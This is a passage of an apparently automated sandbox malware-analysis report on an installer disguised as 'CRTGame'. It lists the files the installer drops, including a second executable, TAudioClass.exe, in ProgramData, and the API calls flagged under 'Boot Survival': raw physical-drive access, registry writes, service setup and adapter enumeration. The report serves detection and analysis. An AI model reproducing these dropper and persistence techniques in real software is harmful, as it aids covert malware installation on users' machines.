                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-3DBAJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-GSP1P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_RegDLL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-1CHIA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-GRQ3N.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-MJ59N.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-O5QKP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-VP35T.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-NJ7JN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-FBHLC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-GUEH6.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-ITM21.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\crtgame.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-B8HMN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-BA6TO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UG8V7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-6JHM7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-83310.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeFile created: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-JMEV2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-C9QMS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-DMP2Q.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-OMKRE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-63DO2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-GKK7D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-EI0VO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-1KFVE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PBK8V.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-D14K1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-EI90O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-04UN3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-OGODD.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\TAudioClass\TAudioClass.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02C2F2AF
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,CreateThread,WaitForSingleObject,ExitProcess,StartServiceCtrlDispatcherA,4_2_004026F0
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00481CB0
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEAC
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_00401B54
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,6_2_02C2F3B3
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeWindow / User API: threadDelayed 765Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeWindow / User API: threadDelayed 9194Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FJDCA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-TGPT7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-060C4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DFCBR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JB8NH.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-EQ4MD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ISCOD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KR7LG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LTIA8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HI2BI.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-4LN2K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-44UDD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HVEOK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-CA2OV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-CKJ1G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GSP1P.tmpJump to dropped file
